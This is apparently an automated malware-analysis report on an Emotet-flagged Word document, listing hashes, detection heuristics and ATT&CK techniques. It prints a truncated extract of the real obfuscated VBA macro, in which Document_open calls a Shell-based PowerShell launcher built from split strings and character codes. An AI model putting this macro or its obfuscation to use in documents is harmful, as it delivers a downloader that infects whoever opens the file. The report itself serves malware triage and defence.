Emotet Office (OLE) malware analysis — malicious · 37c79185ba86cdbe

MALICIOUS

Office (OLE)

123.5 KB Created: 2018-06-14 06:50:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c877e7f78c39105acba109703b6d6f5e SHA-1: 5a6c7b9a4bb99700b3c2b58f19ea389e17479f02 SHA-256: 37c79185ba86cdbecf0653d40c186d240f28dcd85598d2ad56c557a7c2bea580

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that utilizes the Shell() function, a common technique for executing arbitrary commands. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6877417-0', strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a secondary payload, indicated by the Shell() call and the downloader heuristic.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6877417-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877417-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15322 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15322 bytes
SHA-256: `1c67c395c6b927153c0f02aa898ff4e7c1260d7f5ae3796f68a37f4ef70a52c0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KHGMqwXuW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fzWAb() On Error Resume Next uKVjjM = XrJVi - CqdIj / 19486 / wJLrnB - 223327908 + Hex(iriWKE) * tFqWj - Round(67114) cNuzwr = 87458 + wqqGp + (28519 * CDbl(FlCijU) - hihaAk / CSng(66292) - mnPLF / Hex(uoEZV) + 54267 - 10026) VsFXh = cwidq CziSNX = Sqr(21485) XamqL = zsdFB - tksNo / 22488 / iZKBZ - 223327908 + Hex(QAYoZq) * DUBSKz - Round(41891) dlwdv = 60101 + hfJmKi + (86604 * CDbl(lmlCb) - RawlR / CSng(49102) - amYtzp / Hex(HGNbBC) + 84441 - 2070) jiMGW = AIFJdN awriq = Sqr(43887) fNhkU = ATpQmw - zhvNsw / 90155 / FBPSrm - 223327908 + Hex(ZkMZF) * aImPql - Round(76694) stMZNL = 90139 + aDEPM + (6322 * CDbl(jaCpp) - XEMFY / CSng(89633) - LrGWT / Hex(Laotzn) + 51751 - 74125) GVzvAl = phiDX Rtjohj = Sqr(11361) doYESc = rnilaF - jXwmVc / 79620 / niAau - 223327908 + Hex(wjwTT) * fiQqs - Round(45947) aMSRc = 5756 + tFDMsw + (43031 * CDbl(JzBMH) - ziaiu / CSng(33663) - oIWou / Hex(AwTzN) + 66365 - 12039) IXonwU = lbpkL CTcuww = Sqr(75042) fzWAb = hCHkkPHlU + VBA.Shell(TjBqakLFsB + Chr(JwjUOhaSYO + vbKeyP + rawTkVihJ) + "owers" + jHDEhW + sSRbaB + FCvjPdP + kFCAo + CbmiaOwvIQu, 61718 - 61718) oRiwYm = MhstzA - BbzSO / 33081 / UuIWfk - 223327908 + Hex(CzRwj) * wSLMBP - Round(77589) mdAtD = 85278 + XtEmSH + (86143 * CDbl(wGHuz) - NqHhV / CSng(99604) - XtmkqJ / Hex(ChXnAp) + 82870 - 65523) bJfzf = GmEwLc tiYhp = Sqr(77392) cuoFkK = vFHKNY - DXpna / 95922 / kSYuG - 223327908 + Hex(EUaOM) * DuSsXL - Round(59648) UWWZt = 3589 + KkavQE + (36769 * CDbl(PlQwcZ) - mMfzw / CSng(44606) - WCWMhd / Hex(pnINJA) + 39784 - 63025) FHvrh = rCaPbX bdVIm = Sqr(79208) End Function Private Sub Document_open() On Error Resume Next uPLhYj = IMjwz - IcuBGt / 28770 / KwFpM - 223327908 + Hex(nvmhA) * DSlfun - Round(3497) sbQLdw = 80079 + iszjVi + (72130 * CDbl(SbvEwc) - inzkj / CSng(28123) - uAqMBq / Hex(LhjDld) + 20266 - 85870) MICqGI = XFfUMr mwlbNt = Sqr(32797) SoHFfz = MzioG - MbvjU / 15887 / oEqLE - 223327908 + Hex(mNdNi) * qbulub - Round(74135) ljQFr = 21835 + aNZCz + (27088 * CDbl(qqOHSs) - GmEtuc / CSng(63276) - DNaBh / Hex(iUaCc) + 63214 - 83965) uYtMv = iTrZHz zrPhwn = Sqr(55476) fzWAb uwHtN = BdjFL - YXEjj / 92096 / DDiBwC - 223327908 + Hex(cIUzMi) * sRDGq - Round(48932) GoOwwA = 12835 + wikEu + (30854 * CDbl(RqBFhX) - awwSU / CSng(2772) - zKMAOk / Hex(jmzbfZ) + 19599 - 60374) INFtsk = mPTAd owUoV = Sqr(48481) rwWPCi = TZwiIV - VYmaB / 8248 / dqPraZ - 223327908 + Hex(sBOMl) * LLwfAz - Round(36777) kVOQuJ = 82646 + mtJjs + (62603 * CDbl(fFAapW) - Sjjbj / CSng(88531) - iYCKUu / Hex(dAJzz) + 13828 - 56764) lTvaO = HwkRo KOihfb = Sqr(86695) End Sub Attribute VB_Name = "XCcVWDsKvFZos" Function jHDEhW() On Error Resume Next ljTIm = nJcBTE qowAOw = Sqr(60585) ozKROW = 87561 + wqiMl + (63483 * CDbl(dQTHka) - UYQcl / CSng(24951) - iLzfC / Hex(hIbWQ) + 3693 - 14402) iLTPU = lBmkjE - ifhjJ / 14348 / owriT - 223327908 + Hex(ikTbWO) * SdnLm - Round(5865) zLEwdnnPQ = "HeLL" + " .( $VeRB" + "OsePrE" + "FEr" + "ENCE.tO" XakfV = ULJOR VsZRD = Sqr(37830) rKXlT = 70650 + oBBhKO + (35158 * CDbl(ABrVwG) - zNMMN / CSng(32080) - TaEKR / Hex(LvsUb) + 81937 - 27925) KStUz = MJZHXf - iacAzv / 45129 / JXuGr - 223327908 + Hex(bUmuK) * rIILpR - Round(71876) kvFPlfXap = "St" + "rIn" + "G()[1,3]+'x" + "'-" + "joIn'') " + "( -jOIn ([ch" + "AR[]]" + "(2, 104 ,126, " lSMDLl = vQYUH zqcztc = Sqr(98339) PAvzOH = 63198 + omMNil + (48307 * CDbl(RKfJY) - qKqvG / CSng(73389) - ENaCAb / Hex(NMbJE) + 26355 - 92923) ozXvK = ITBuEk - lKhKQ / 9985 / jVFLX - 223327908 + Hex(KzSGs) * FzlEd - Round(61846) FLWMoOwpsi = "81" + " , 96 , 81,6" + "8 , 6, 27 ,6" + " ,72 , " + "67, 81 ,11 ," + " 73 , " + "68 , " + "76, " + "67,69, 82, " + "6 , 84,71 ," cDIIJJ = INjup NHJhj = Sqr(26569) XuiTsM = 46193 + ZIAvC + (44 * CDbl(YAGEiS) - BbNvBL / ... (truncated)

SHA-256: 1c67c395c6b927153c0f02aa898ff4e7c1260d7f5ae3796f68a37f4ef70a52c0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KHGMqwXuW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fzWAb()
On Error Resume Next
uKVjjM = XrJVi - CqdIj / 19486 / wJLrnB - 223327908 + Hex(iriWKE) * tFqWj - Round(67114)
cNuzwr = 87458 + wqqGp + (28519 * CDbl(FlCijU) - hihaAk / CSng(66292) - mnPLF / Hex(uoEZV) + 54267 - 10026)
VsFXh = cwidq
CziSNX = Sqr(21485)
XamqL = zsdFB - tksNo / 22488 / iZKBZ - 223327908 + Hex(QAYoZq) * DUBSKz - Round(41891)
dlwdv = 60101 + hfJmKi + (86604 * CDbl(lmlCb) - RawlR / CSng(49102) - amYtzp / Hex(HGNbBC) + 84441 - 2070)
jiMGW = AIFJdN
awriq = Sqr(43887)
fNhkU = ATpQmw - zhvNsw / 90155 / FBPSrm - 223327908 + Hex(ZkMZF) * aImPql - Round(76694)
stMZNL = 90139 + aDEPM + (6322 * CDbl(jaCpp) - XEMFY / CSng(89633) - LrGWT / Hex(Laotzn) + 51751 - 74125)
GVzvAl = phiDX
Rtjohj = Sqr(11361)
doYESc = rnilaF - jXwmVc / 79620 / niAau - 223327908 + Hex(wjwTT) * fiQqs - Round(45947)
aMSRc = 5756 + tFDMsw + (43031 * CDbl(JzBMH) - ziaiu / CSng(33663) - oIWou / Hex(AwTzN) + 66365 - 12039)
IXonwU = lbpkL
CTcuww = Sqr(75042)
fzWAb = hCHkkPHlU + VBA.Shell(TjBqakLFsB + Chr(JwjUOhaSYO + vbKeyP + rawTkVihJ) + "owers" + jHDEhW + sSRbaB + FCvjPdP + kFCAo + CbmiaOwvIQu, 61718 - 61718)
oRiwYm = MhstzA - BbzSO / 33081 / UuIWfk - 223327908 + Hex(CzRwj) * wSLMBP - Round(77589)
mdAtD = 85278 + XtEmSH + (86143 * CDbl(wGHuz) - NqHhV / CSng(99604) - XtmkqJ / Hex(ChXnAp) + 82870 - 65523)
bJfzf = GmEwLc
tiYhp = Sqr(77392)
cuoFkK = vFHKNY - DXpna / 95922 / kSYuG - 223327908 + Hex(EUaOM) * DuSsXL - Round(59648)
UWWZt = 3589 + KkavQE + (36769 * CDbl(PlQwcZ) - mMfzw / CSng(44606) - WCWMhd / Hex(pnINJA) + 39784 - 63025)
FHvrh = rCaPbX
bdVIm = Sqr(79208)
End Function
Private Sub Document_open()
On Error Resume Next
uPLhYj = IMjwz - IcuBGt / 28770 / KwFpM - 223327908 + Hex(nvmhA) * DSlfun - Round(3497)
sbQLdw = 80079 + iszjVi + (72130 * CDbl(SbvEwc) - inzkj / CSng(28123) - uAqMBq / Hex(LhjDld) + 20266 - 85870)
MICqGI = XFfUMr
mwlbNt = Sqr(32797)
SoHFfz = MzioG - MbvjU / 15887 / oEqLE - 223327908 + Hex(mNdNi) * qbulub - Round(74135)
ljQFr = 21835 + aNZCz + (27088 * CDbl(qqOHSs) - GmEtuc / CSng(63276) - DNaBh / Hex(iUaCc) + 63214 - 83965)
uYtMv = iTrZHz
zrPhwn = Sqr(55476)
fzWAb
uwHtN = BdjFL - YXEjj / 92096 / DDiBwC - 223327908 + Hex(cIUzMi) * sRDGq - Round(48932)
GoOwwA = 12835 + wikEu + (30854 * CDbl(RqBFhX) - awwSU / CSng(2772) - zKMAOk / Hex(jmzbfZ) + 19599 - 60374)
INFtsk = mPTAd
owUoV = Sqr(48481)
rwWPCi = TZwiIV - VYmaB / 8248 / dqPraZ - 223327908 + Hex(sBOMl) * LLwfAz - Round(36777)
kVOQuJ = 82646 + mtJjs + (62603 * CDbl(fFAapW) - Sjjbj / CSng(88531) - iYCKUu / Hex(dAJzz) + 13828 - 56764)
lTvaO = HwkRo
KOihfb = Sqr(86695)
End Sub


Attribute VB_Name = "XCcVWDsKvFZos"
Function jHDEhW()
On Error Resume Next
ljTIm = nJcBTE
qowAOw = Sqr(60585)
ozKROW = 87561 + wqiMl + (63483 * CDbl(dQTHka) - UYQcl / CSng(24951) - iLzfC / Hex(hIbWQ) + 3693 - 14402)
iLTPU = lBmkjE - ifhjJ / 14348 / owriT - 223327908 + Hex(ikTbWO) * SdnLm - Round(5865)
zLEwdnnPQ = "HeLL" + "  .( $VeRB" + "OsePrE" + "FEr" + "ENCE.tO"
XakfV = ULJOR
VsZRD = Sqr(37830)
rKXlT = 70650 + oBBhKO + (35158 * CDbl(ABrVwG) - zNMMN / CSng(32080) - TaEKR / Hex(LvsUb) + 81937 - 27925)
KStUz = MJZHXf - iacAzv / 45129 / JXuGr - 223327908 + Hex(bUmuK) * rIILpR - Round(71876)
kvFPlfXap = "St" + "rIn" + "G()[1,3]+'x" + "'-" + "joIn'') " + "( -jOIn ([ch" + "AR[]]" + "(2, 104 ,126, "
lSMDLl = vQYUH
zqcztc = Sqr(98339)
PAvzOH = 63198 + omMNil + (48307 * CDbl(RKfJY) - qKqvG / CSng(73389) - ENaCAb / Hex(NMbJE) + 26355 - 92923)
ozXvK = ITBuEk - lKhKQ / 9985 / jVFLX - 223327908 + Hex(KzSGs) * FzlEd - Round(61846)
FLWMoOwpsi = "81" + " , 96 , 81,6" + "8 , 6, 27 ,6" + " ,72 , " + "67, 81 ,11 ," + " 73 , " + "68 , " + "76, " + "67,69, 82, " + "6 , 84,71 ,"
cDIIJJ = INjup
NHJhj = Sqr(26569)
XuiTsM = 46193 + ZIAvC + (44 * CDbl(YAGEiS) - BbNvBL / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.